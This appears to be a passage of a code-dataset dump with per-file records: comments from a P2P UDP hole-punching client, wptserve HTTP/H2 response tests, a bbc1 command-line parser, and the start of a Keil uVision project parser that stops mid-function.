error_message buffer_size = 128 callback_object = ConnectionCallback() client.connect_to_peer(peer_username, buffer_size, callback_object) while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() client_key = callback_object.client_key udp_client = client.client_map[client_key] # Now you can communicate with that peer. udp_client.send_message("Greetings!") udp_client.pop_all_messages() # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values. # login will expire after this many seconds passes without successful keep-alive authentication # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication. # all messages recieved # log per message type. # this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.) # Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out. # Private. Internal use only. # list of ranges, e.g. ports 34000 - 34100 # dictionary of active udp connections (hole-punched) # Initialize TCP client. # Start listening to the stun server. # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop. # disconnect all udp clients... #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info()); Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings. If target key is not null, then target_object will be treated as a dictionary (using target_key for the index). This function is best utilized on its own separate thread. # Wait until salt and key have been retrieved or timeout occurs. #print "Monitoring for %s" % target_object; # Behold, python lambda expressions in the wild! # check for shutdown. # check for target condition # Check for timeout. #print "Timeout on %s" % target_object; #else: # print "No timeout on %s" % target_object; # Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event). # callback_object should have a complete_authentication(success, error_message) method. # Send salt and dynamic key retrieval request. #callback_object.complete_authentication(False, "Failed to connect to the server."); # Wait until salt and key have been retrieved or timeout occurs. # hash the password #print "hash1: %s\n" % hashed_salted_password; #print "hash2: %s" % hashed_password; # Send authentication request. # Construct the message. # Encrypt the message. # Tack on the username in plain text and json_encode again. The STUN Server needs to username to determine which private key to use to decrypt the message. # Wait until salt and key have been retrieved or timeout occurs. # callback_object should have a complete_registration(success, error_message) method. Non-blocking. Sends a user authentication request. # Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results. #self.authentication_monitor_object # By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable. # I'll need to rename it something better. Maybe later (trademark). Non-blocking. Sends a user registration request. Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users). Note that profile_map should be a json-encoded string (you can store arbitrary data here). # Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results. #print "MESSAGE: %s\n" % message_object; # peer data should be [[peer_username, public_profile_map], ...] # message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size] # Ensure port isn't already in use. # Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist. # message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size] # message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size] # No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid. # My mind is feeling like it's been twisted into a few knots at this point, to be honest. # message body should be [salt, dynamic_key] # message body should be [success, username, profile_map, login, error_message] # message body should be "public_key" # message body should be [success, username, profile_map, error_message] callback_object should have a complete_connection(target, success, error_message) method where success is True or False. Extract info with: ip, port, username = target.split("-",2) Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.). # Disallow connecting to yourself. What are you trying to pull? # disallow connecting to blocked peers. # Start hole_punch process. # Wait until salt and key have been retrieved or timeout occurs. Warning: Internal use only! # success, add it to the map. # remove that port from the used ports list. # run the callback, if there is one. # Create and return a udp socket that has established connection with the target peer, or None if it fails. # give up and close it out. # check the packet. # send acknowledge # send ack ack and return socket. # ack ack received, return socket. # check for timeout | 2.682485 | 3 |
tools/wptserve/tests/functional/test_response.py | qanat/wpt | 1 | 8552 | import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| en | 0.956994 | # Should detect stream isn't ended and call `writer.end_stream()` | 2.425812 | 2 |
bbc1/core/command.py | ks91/bbc1-pub | 89 | 8553 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
| # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
| en | 0.854731 | # -*- coding: utf-8 -*- Copyright (c) 2017 beyond-blockchain.org. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 2.595205 | 3 |
main.py | cmcquinn/cmake-uvision-syncer | 0 | 8554 | """
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
